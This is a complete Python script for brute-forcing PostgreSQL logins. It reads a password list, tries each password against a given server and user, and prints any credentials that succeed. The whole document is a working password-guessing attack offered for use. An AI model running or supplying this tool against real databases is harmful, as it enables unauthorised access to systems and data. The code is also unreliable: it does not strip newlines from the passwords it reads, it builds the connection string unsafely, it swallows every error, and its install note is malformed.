postgresbrute.py

#!/usr/bin/env python3
# -*- UTF-8 -*-
# Prereqs:
# sudo apt-get install libpq-dev
# sudo pip3 install argparse, psycopg2
import argparse
import psycopg2
from time import sleep


def brute_psql(dbname,passlist,username,server,verbose):
    print("[+] Starting Brute Force...\n")
    with open(passlist, "r") as passwords:
        for password in passwords:
            try:
                connection = "dbname='{0}' user='{1}' host='{2}' password='{3}'".format(dbname,username,server,password)
                cxn = psycopg2.connect(connection)
                cursor = cxn.cursor()
                print("[!] Connection valid: {0}:{1}".format(username,password))

            except:
                if verbose == True:
                    print("[-] Invalid Login: {0}:{1}".format(username,password))
                else:
                    pass
            sleep(1)
        print("[+] Brute-Force Complete.")



progdesc = "Postgres brute-force tool"
parser = argparse.ArgumentParser(description=progdesc)
parser.add_argument('-s', metavar='Server', action='store', help='DNS Name or IP Address')
parser.add_argument('-u', metavar='Username', action='store', help='Ex: postgres')
parser.add_argument('-p', metavar='Password List', action='store', help='Ex: /root/passwords.txt')
parser.add_argument('-d', metavar='DBName', action='store', default='template1',
                    help='Ex: template1, orders, users, etc')
parser.add_argument('-v', action='store_true', default=False,
                    help='Verbose mode (show failed logins)')

args = parser.parse_args()

if args.s:
    server = args.s

if args.u:
    username = args.u

if args.p:
    passlist = args.p

if args.d:
    dbname = args.d

if args.v:
    verbose = True

if not args.v:
    verbose = False

if not args.s or not args.u or not args.p:
    parser.print_help()

else:
    brute_psql(dbname,passlist,username,server,verbose)